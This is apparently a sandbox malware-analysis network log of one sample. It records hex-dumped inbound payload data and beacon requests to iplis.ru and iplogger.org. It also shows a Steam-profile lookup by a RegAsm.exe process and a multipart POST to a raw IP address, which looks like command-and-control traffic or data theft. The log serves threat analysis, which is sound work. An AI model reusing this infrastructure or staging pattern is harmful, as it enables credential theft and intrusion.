2024-03-28 08:15:11 UTC	16384	IN	Data Raw: 15 15 13 2f dd ea ea ea 33 2d ab ea ea ea 15 04 0a 04 55 cd 06 06 2d 18 15 15 15 03 06 15 35 17 15 15 15 2d bd ea ea ea 04 03 04 02 cd 06 06 35 16 15 15 15 2d 82 ea ea ea 2d 52 15 15 15 35 10 15 15 15 2d 9d ea ea ea 04 09 04 08 c3 06 06 35 14 15 15 15 3d e5 15 15 13 2f 67 ea ea ea 33 35 14 15 15 15 2d 72 ea ea ea 04 0d 04 0c cf 06 06 35 11 15 15 15 3d e4 15 15 13 2c 44 ea ea ea 33 2d 52 ea ea ea 04 15 3f 06 25 16 15 fa 15 15 15 0f 15 15 04 3e 10 3d 45 7f 5b 2b 35 14 15 15 15 eb 1b 0b 15 2d 15 15 15 15 eb 19 0b 15 50 12 15 15 15 32 15 15 15 70 15 15 15 92 15 15 15 41 15 15 15 1d 15 15 15 b1 15 15 15 10 15 15 15 2d 37 15 15 15 04 15 3f 2d ed ea ea ea 35 13 15 15 15 3d e4 15 15 13 2c d6 ea ea ea 33 35 11 15 15 15 2d ad ea ea ea 04 03 04 02 cf 06 06 2d 15 15 Data Ascii: /3-U-5-5--R5-5=/g35-r5=,D3-R?%>=E[+5-P2pA-7?-5=,35--
2024-03-28 08:15:11 UTC	16384	IN	Data Raw: 88 ea ea ea 33 35 14 15 15 15 2d 87 ea ea ea 04 09 04 08 cd 06 06 2d c2 ea ea ea 04 03 04 02 cd 06 06 35 17 15 15 15 2d 60 ea ea ea 04 0b 3f 04 0f 04 0e cd 06 06 35 11 15 15 15 2d 74 ea ea ea 15 04 0a 04 55 cf 06 06 35 10 15 15 15 3d 5e 14 15 13 2f 5f ea ea ea 33 2d ff ea ea ea 15 15 15 06 25 16 15 f2 15 15 15 0f 15 15 04 3e 10 3d 28 72 7e 5d 35 13 15 15 15 eb 1b 18 15 2d 15 15 15 15 eb 19 18 15 50 12 15 15 15 94 15 15 15 20 15 15 15 10 15 15 15 33 15 15 15 85 15 15 15 3c 15 15 15 5b 15 15 15 2d 69 15 15 15 04 0f 04 0e cf 06 06 35 14 15 15 15 3d 59 14 15 13 2f d1 ea ea ea 33 35 14 15 15 15 2d ac ea ea ea 04 15 3f 04 03 04 02 cf 06 06 2d 3e 15 15 15 04 09 79 04 08 79 4e 3d 5f 14 15 13 a2 06 06 35 11 15 15 15 2d 84 ea ea ea 15 04 0a 04 55 cf 06 06 35 10 15 Data Ascii: 35--5-`?5-tU5=^/_3-%>=(r~]5-P 3<[-i5=Y/35-?->yyN=_5-U5
2024-03-28 08:15:11 UTC	16384	IN	Data Raw: cf 06 06 35 10 15 15 15 2d a5 ea ea ea 2d 49 15 15 15 35 15 15 15 15 3d b2 14 15 13 2f 89 ea ea ea 33 35 14 15 15 15 2d 84 ea ea ea 04 0d 79 04 0c 79 4e 3d b0 14 15 13 a2 06 06 35 11 15 15 15 eb 1b 03 15 2d 65 ea ea ea 04 0f 79 04 0e 79 4e 3d b0 14 15 13 a2 06 06 35 17 15 15 15 2d 4e ea ea ea 04 0b 04 02 c3 06 06 2d ab ea ea ea 04 15 3f 04 09 04 08 cf 06 06 35 16 15 15 15 2d 2e ea ea ea 15 15 5f 3e 10 3d d4 6c 44 3b 15 eb 1c 15 15 3d 59 15 15 1f 3f 15 57 3e 10 3d 2a 66 3a 75 6b 25 15 15 11 0a eb 14 3f 15 15 15 23 3e 10 3d 81 6c 51 49 6b 25 15 15 11 3f 15 15 2f 3e 10 3d f1 6a 59 76 17 3d 3f 15 15 1f 3f 15 06 25 16 15 ce 15 15 15 0f 15 15 04 3e 10 3d f8 c2 1e 2e 2d 68 15 15 15 eb 19 16 15 50 13 15 15 15 10 15 15 15 64 15 15 15 be 15 15 15 0a 15 15 15 86 15 Data Ascii: 5--I5=/35-yyN=5-eyyN=5-N-?5-._>=lD;=Y?W>=*f:uk%?#>=lQIk%?/>=jYv=??%>=.-hPd
2024-03-28 08:15:11 UTC	16384	IN	Data Raw: 7c 7d 70 35 11 15 15 15 eb 1b 0b 15 2d 15 15 15 15 eb 19 0b 15 50 12 15 15 15 90 15 15 15 63 15 15 15 38 15 15 15 25 15 15 15 59 15 15 15 4b 15 15 15 34 15 15 15 2d 95 15 15 15 04 0f 04 0e cf 06 06 35 15 15 15 15 3d 1b 17 15 13 2f d1 ea ea ea 33 2d af ea ea ea 04 0d 04 0c c3 06 06 2d cd ea ea ea 04 15 3f 04 03 04 02 cd 06 06 35 13 15 15 15 3d 1a 17 15 13 2c 8c ea ea ea 33 2d 9a ea ea ea 15 04 0a 04 55 cf 06 06 35 16 15 15 15 2d 94 ea ea ea 03 06 15 35 14 15 15 15 3d 1a 17 15 13 2c 7a ea ea ea 33 2d 70 ea ea ea 2d a7 ea ea ea 35 17 15 15 15 2d 4f ea ea ea 04 09 04 08 c3 06 06 35 10 15 15 15 eb 1b 0b 15 2d 54 ea ea ea 06 25 16 15 c0 15 15 15 0f 15 15 04 3e 10 3d 7d 00 26 2c 35 13 15 15 15 eb 1b 15 15 2d 15 15 15 15 eb 19 15 15 50 12 15 15 15 44 15 15 15 99 Data Ascii: \|}p5-Pc8%YK4-5=/3--?5=,3-U5-5=,z3-p-5-O5-T%>=}&,5-PD
2024-03-28 08:15:11 UTC	16384	IN	Data Raw: 0f 04 0e c3 06 06 35 17 15 15 15 2d dc ea ea ea 2d 02 15 15 15 2d 07 15 15 15 15 04 0b 04 55 cd 06 06 35 11 15 15 15 2d b8 ea ea ea 04 15 3f 04 03 79 04 02 79 4e 3d 59 15 15 1f a2 06 06 35 13 15 15 15 3d 7c 17 15 13 2f 99 ea ea ea 33 2d 97 ea ea ea 04 0d 04 0c c3 06 06 35 16 15 15 15 2d 60 ea ea ea 04 09 04 08 cf 06 06 35 15 15 15 15 3d 7c 17 15 13 2f 4a ea ea ea 33 35 15 15 15 15 2d 41 ea ea ea 03 06 15 35 14 15 15 15 3d 7f 17 15 13 2f 57 ea ea ea 33 35 14 15 15 15 2d 22 ea ea ea 15 15 06 25 16 15 eb 15 15 15 0f 15 15 04 3e 10 3d 64 33 72 26 35 16 15 15 15 eb 1b 03 15 2d 15 15 15 15 eb 19 03 15 50 12 15 15 15 8e 15 15 15 42 15 15 15 67 15 15 15 10 15 15 15 0e 15 15 15 73 15 15 15 29 15 15 15 2d 83 15 15 15 15 04 0a 04 55 cf 06 06 35 17 15 15 15 eb 1b 03 Data Ascii: 5---U5-?yyN=Y5=\|/3-5-`5=\|/J35-A5=/W35-"%>=d3r&5-PBgs)-U5
2024-03-28 08:15:11 UTC	16384	IN	Data Raw: ea ea ea 33 2d 75 ea ea ea 04 09 04 08 cd 06 06 35 17 15 15 15 2d 46 ea ea ea 04 15 3f 2d ed ea ea ea 35 10 15 15 15 eb 1b 0f 15 2d 2c ea ea ea 06 25 16 15 f5 15 15 15 0f 15 15 04 3e 10 3d 67 84 55 2c 35 11 15 15 15 eb 1b 1b 15 2d 15 15 15 15 eb 19 1b 15 50 12 15 15 15 57 15 15 15 8c 15 15 15 10 15 15 15 34 15 15 15 7d 15 15 15 6f 15 15 15 4b 15 15 15 2d 28 15 15 15 04 0f 04 0e cd 06 06 35 15 15 15 15 3d d0 17 15 13 2c d1 ea ea ea 33 2d af ea ea ea 04 03 04 02 c3 06 06 35 16 15 15 15 3d d0 17 15 13 2f bd ea ea ea 33 35 10 15 15 15 2d 88 ea ea ea 04 09 04 08 cd 06 06 35 14 15 15 15 3d d0 17 15 13 2c 92 ea ea ea 33 2d 68 ea ea ea 2d 26 15 15 15 2d 3b 15 15 15 15 04 0a 04 55 c3 06 06 35 16 15 15 15 2d 70 ea ea ea 04 0d 04 0c cd 06 06 35 17 15 15 15 3d d0 17 Data Ascii: 3-u5-F?-5-,%>=gU,5-PW4}oK-(5=,3-5=/35-5=,3-h-&-;U5-p5=
2024-03-28 08:15:11 UTC	16384	IN	Data Raw: 11 3f 15 15 2f 3e 10 3d 3e 4b 46 53 17 3d 3f 15 15 1f 3f 15 06 25 16 15 c8 15 15 15 0f 15 15 04 3e 10 3d 77 f4 23 58 35 16 15 15 15 eb 1b 18 15 2d 15 15 15 15 eb 19 18 15 50 12 15 15 15 5f 15 15 15 4b 15 15 15 10 15 15 15 74 15 15 15 91 15 15 15 34 15 15 15 3b 15 15 15 2d 50 15 15 15 04 03 04 02 cf 06 06 35 13 15 15 15 3d 38 16 15 13 2c d1 ea ea ea 33 2d af ea ea ea 03 06 15 35 11 15 15 15 2d a4 ea ea ea 04 0d 04 0c cd 06 06 35 15 15 15 15 3d 38 16 15 13 2c 8e ea ea ea 33 2d 84 ea ea ea 04 0f 79 04 0e 79 4e 3d 3e 16 15 13 a2 06 06 2d 55 15 15 15 04 15 3f 15 04 0a 04 55 cf 06 06 35 17 15 15 15 2d 79 ea ea ea 04 09 04 08 c3 06 06 35 10 15 15 15 2d 4e ea ea ea 2d c0 ea ea ea 35 15 15 15 15 3d 38 16 15 13 2f 52 ea ea ea 33 35 14 15 15 15 2d 29 ea ea ea 15 15 Data Ascii: ?/>=>KFS=??%>=w#X5-P_Kt4;-P5=8,3-5-5=8,3-yyN=>-U?U5-y5-N-5=8/R35-)
2024-03-28 08:15:11 UTC	16384	IN	Data Raw: 13 2f ae ea ea ea 33 2d a4 ea ea ea 03 06 15 35 14 15 15 15 3d 92 16 15 13 2c b6 ea ea ea 33 35 14 15 15 15 2d 8d ea ea ea 2d 49 15 15 15 35 13 15 15 15 2d 9c ea ea ea 04 03 79 04 02 79 4e 3d 9d 16 15 13 a2 06 06 35 17 15 15 15 2d 65 ea ea ea 04 0d 04 0c cd 06 06 2d 09 15 15 15 04 09 04 08 c3 06 06 35 15 15 15 15 3d 92 16 15 13 2c 5b ea ea ea 33 2d 51 ea ea ea 04 0f 04 0b c3 06 06 35 16 15 15 15 2d 22 ea ea ea 04 15 3f 15 15 15 06 25 16 15 10 14 15 15 0f 15 15 04 3e 10 3d 79 f2 65 42 35 16 15 15 15 eb 1b 14 15 2d 15 15 15 15 eb 19 14 15 50 12 15 15 15 98 15 15 15 bf 15 15 15 94 15 15 15 42 15 15 15 0a 15 15 15 10 15 15 15 2e 15 15 15 2d 9d 15 15 15 2d 1f 15 15 15 35 11 15 15 15 2d 05 ea ea ea 04 15 3f 04 0d 79 04 0c 79 4e 3d 9d 16 15 13 a2 06 06 35 14 15 Data Ascii: /3-5=,35--I5-yyN=5-e-5=,[3-Q5-"?%>=yeB5-PB.--5-?yyN=5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49804	104.21.63.150	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:18 UTC	193	OUT	GET /1aFYp7.mp3 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: iplis.ru
2024-03-28 08:15:18 UTC	1139	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:15:18 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close memory: 0.42269134521484375 expires: Thu, 28 Mar 2024 08:15:18 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: BYPASS Set-Cookie: 293925101722101803=3; expires=Fri, 28 Mar 2025 08:15:18 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=102.165.48.43; expires=Fri, 28 Mar 2025 08:15:18 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GI89UlSf8rtjkcDlEsdojfDuf1%2B1s2yGID6Vd%2Fqpb6okKbvd2eR0BKAL32JawcI2tSAZxGvmt7cDKRJLMXvg4CuR0JQSwrStbBXYrMa%2F41XOmQVsbQe3brWlPg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62beb498f2093-IAD alt-svc: h3=":443"; ma=86400
2024-03-28 08:15:18 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-03-28 08:15:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49805	172.67.132.113	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:19 UTC	196	OUT	GET /1nhuM4.js HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: iplogger.org
2024-03-28 08:15:20 UTC	1024	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:15:20 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close memory: 0.41266632080078125 expires: Thu, 28 Mar 2024 08:15:19 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=31536000 x-frame-options: SAMEORIGIN CF-Cache-Status: BYPASS Set-Cookie: 405890041722101803=3; expires=Fri, 28 Mar 2025 08:15:19 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=102.165.48.43; expires=Fri, 28 Mar 2025 08:15:19 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h2tD%2FHnVliZKD8qmCEKKmZL6sVE8FeCZEvzwYgshBXko1eSlpLcgmwNcryNN3PjvO7CUJiYNhKMLw%2FfJDtLOHOuxbVAeth%2BMx4P1XVHLj2RzoXyz35OjfQzmzaPcZwM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62bf359980824-IAD alt-svc: h3=":443"; ma=86400
2024-03-28 08:15:20 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-03-28 08:15:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49806	104.21.63.150	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:20 UTC	193	OUT	GET /1pRXr7.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: iplis.ru
2024-03-28 08:15:20 UTC	1140	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:15:20 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close set-cookie: 276313111722101803=3; expires=Fri, 28 Mar 2025 08:15:20 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict set-cookie: clhf03028ja=102.165.48.43; expires=Fri, 28 Mar 2025 08:15:20 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict memory: 0.41320037841796875 expires: Thu, 28 Mar 2024 08:15:20 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y0I3sVEmkM5WzPtGa1ATjW4JX3fSCjD3HVktaA8oBPgflEE2bWbrfK05bxw22DBk25oRA4JzvO13qEEF64F7J%2B2AYC8imQs4tIvCWWq4DQ%2Bvz7o1Ex%2FsAS82SQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62bf8bf9d58cc-IAD alt-svc: h3=":443"; ma=86400
2024-03-28 08:15:20 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-03-28 08:15:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49808	104.21.63.150	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:21 UTC	193	OUT	GET /1BV4j7.mp4 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: iplis.ru
2024-03-28 08:15:21 UTC	1136	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:15:21 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close memory: 0.4131927490234375 expires: Thu, 28 Mar 2024 08:15:21 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: BYPASS Set-Cookie: 274509521722101803=3; expires=Fri, 28 Mar 2025 08:15:21 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=102.165.48.43; expires=Fri, 28 Mar 2025 08:15:21 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uHQrLYbAs7MuWyByIkkNeukQ2aWatiW6cYrOxnBBBcwcPg2HK3DE3uLZMUMNJsU8iaYW%2F5Oj1uHdfQ1zkChEMZ15buiOCNdvdBQmaPC3%2BYTaXcayZoYCEsDchA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62bfe2c9781c3-IAD alt-svc: h3=":443"; ma=86400
2024-03-28 08:15:21 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-03-28 08:15:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49809	23.47.27.74	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:22 UTC	119	OUT	GET /profiles/76561199658817715 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:15:22 UTC	1882	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 28 Mar 2024 08:15:22 GMT Content-Length: 34657 Connection: close Set-Cookie: sessionid=7b4140e3dcc0a605ce6e2e3c; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C4501bef07644d0152615a97beef5c423; Path=/; Secure; HttpOnly; SameSite=None
2024-03-28 08:15:22 UTC	14502	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-03-28 08:15:22 UTC	10074	IN	Data Raw: 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 63 63 6f 75 6e 74 20 4d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 69 6e 73 74 61 6c 6c 73 74 65 61 6d 5f 62 74 6e 20 68 65 61 64 65 72 5f 69 6e 73 74 61 Data Ascii: '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Menu"><a class="header_installsteam_btn header_insta
2024-03-28 08:15:22 UTC	10081	IN	Data Raw: 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 70 75 62 6c 69 63 5c 2f 73 68 61 72 65 64 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 48 41 54 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 Data Ascii: :\/\/store.cloudflare.steamstatic.com\/","PUBLIC_SHARED_URL":"https:\/\/community.cloudflare.steamstatic.com\/public\/shared\/","COMMUNITY_BASE_URL":"https:\/\/steamcommunity.com\/","CHAT_BASE_URL":&q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49810	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:23 UTC	218	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:15:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:15:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49811	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:26 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
